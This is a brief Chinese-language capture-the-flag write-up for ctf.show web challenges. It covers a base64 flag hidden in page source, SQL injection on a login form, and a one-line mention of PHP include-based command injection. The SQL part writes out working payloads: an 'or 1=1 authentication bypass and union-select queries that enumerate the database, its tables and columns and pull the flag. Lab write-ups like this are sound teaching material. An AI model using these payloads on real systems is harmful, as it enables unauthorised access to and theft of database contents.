ctf.show web write up

web签到题
直接审查源码,就有一个base64加密的flag,直接解码就行

ctf.show_web2
进去之后是一个登陆框
试一下万能密码
admin
‘or 1=1#发现成功了
ctf.show web write up_第1张图片试了之后发现一共有三个字段
根据回显点再来测试查询数据库和表字段
数据库
username=admin&password=’ union select 1,database(),3#

username=admin&password=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=web2 #
字段
username=admin&password=’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’ #

username=admin&password=’ union select 1,flag,3 from web2.flag#
ctf.show_web3
php伟协议加上include实现任意命令注入
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200508104258161.png
测试
ctf.show web write up_第2张图片
ctf.show web write up_第3张图片ctf.show web write up_第4张图片ctf.show web write up_第5张图片

你可能感兴趣的:(ctf.show web write up)